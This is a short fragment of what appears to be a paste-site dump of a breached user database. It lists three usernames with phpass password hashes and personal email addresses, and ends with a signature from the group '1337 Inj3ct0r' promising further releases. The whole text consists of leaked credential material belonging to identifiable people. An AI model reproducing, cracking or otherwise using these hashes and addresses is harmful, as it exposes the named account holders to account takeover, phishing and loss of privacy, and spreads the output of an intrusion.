  944. ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com
  945. fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com
  946. root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com
  947.  
  948.  
  949. is not the end! expected to continue =)
  950.  
  951. 1337 Inj3ct0r DataBase..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement